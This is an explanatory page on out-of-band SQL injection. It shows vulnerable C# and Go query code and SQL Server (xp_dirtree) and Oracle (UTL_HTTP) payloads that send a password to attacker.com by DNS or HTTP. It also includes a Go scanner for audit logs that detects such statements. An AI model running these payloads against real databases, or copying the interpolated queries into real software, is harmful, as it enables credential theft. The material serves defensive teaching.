Out-of-Band SQL Injection
Out-of-band injection uses a different channel for delivering the attack and for retrieving the data, typically by abusing database features that make the database server itself open external network connections (DNS lookups, HTTP requests). DNS exfiltration example:
// Vulnerable C# code: the query-string value is interpolated straight into the SQL text, with no parameters
string userId = Request.QueryString["id"];
string query = $"SELECT * FROM users WHERE id = {userId}";
// Attacker input on SQL Server:
// 1; EXEC('xp_dirtree ''\\\\' + (SELECT password FROM users WHERE id=1) + '.attacker.com\\share''')--
// xp_dirtree resolves the host part of the UNC path, so the password leaves the network as a DNS lookup for the attacker-controlled domain
HTTP request exfiltration example:
// Vulnerable Go code: the search term is formatted into the LIKE pattern, producing LIKE '%<input>%'
userInput := r.URL.Query().Get("search")
query := fmt.Sprintf("SELECT * FROM products WHERE name LIKE '%%%s%%'", userInput)
// Attacker input on Oracle:
// %' || UTL_HTTP.request('http://attacker.com/'||(SELECT password FROM users WHERE rownum=1))--
// UTL_HTTP makes the database server issue the HTTP request, so the selected value is sent to the attacker's server as part of the URL
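A defensive counterpart, added here as an example and not taken from the original page: a Go scan over database audit statements that flags any statement referencing the out-of-band primitives named above (xp_dirtree, UTL_HTTP.request) and separates the high-confidence case, where a subquery feeds the outbound request, from a fixed-destination call an administrator might legitimately run. The sample statements, regular expressions and type names are constructed for this example.

```go
package main
import (
	"fmt"
	"regexp"
	"strings"
)

// Features named on this page that make the DB server itself do DNS or HTTP egress.
var oobPrimitives = []string{"xp_dirtree", "utl_http.request"}
var (
	subqueryRe = regexp.MustCompile(`(?i)\(\s*select\b`)             // a SELECT feeds the statement
	hostRe     = regexp.MustCompile(`(?i)\b[a-z0-9-]+\.[a-z]{2,}\b`) // first domain-like token
)

type Finding struct { // one audited statement that references an OOB primitive
	Index     int    // position of the statement in the input
	Primitive string // OOB-capable feature that was referenced
	Host      string // first domain-like token in the statement, "" if none
	Subquery  bool   // query results are concatenated into the outbound request
}

// ScanStatements flags every statement referencing an OOB primitive; Subquery=true
// is the high-confidence case, a fixed destination (e.g. an admin listing a share) is low.
func ScanStatements(stmts []string) []Finding {
	var findings []Finding
	for i, s := range stmts {
		for _, p := range oobPrimitives {
			if strings.Contains(strings.ToLower(s), p) {
				findings = append(findings, Finding{i, p, hostRe.FindString(s), subqueryRe.MatchString(s)})
				break
			}
		}
	}
	return findings
}

// Constructed audit-log statements: the page's two payloads as the database would
// receive them, a benign search, and a legitimate administrative call.
var sampleStatements = []string{
	`SELECT * FROM users WHERE id = 1; EXEC('xp_dirtree ''\\' + (SELECT password FROM users WHERE id=1) + '.attacker.com\share''')--`,
	`SELECT * FROM products WHERE name LIKE '%%' || UTL_HTTP.request('http://attacker.com/'||(SELECT password FROM users WHERE rownum=1))--%'`,
	`SELECT * FROM products WHERE name LIKE '%widget%'`,
	`EXEC xp_dirtree '\\fileserver\backups'`,
}

func main() {
	for _, f := range ScanStatements(sampleStatements) {
		fmt.Printf("stmt %d: %s host=%q subquery=%v\n", f.Index, f.Primitive, f.Host, f.Subquery)
	}
}
```

Pair this with egress monitoring on the database host: a DNS lookup or HTTP connection from the database server to a domain it has no business contacting is the other half of the signal.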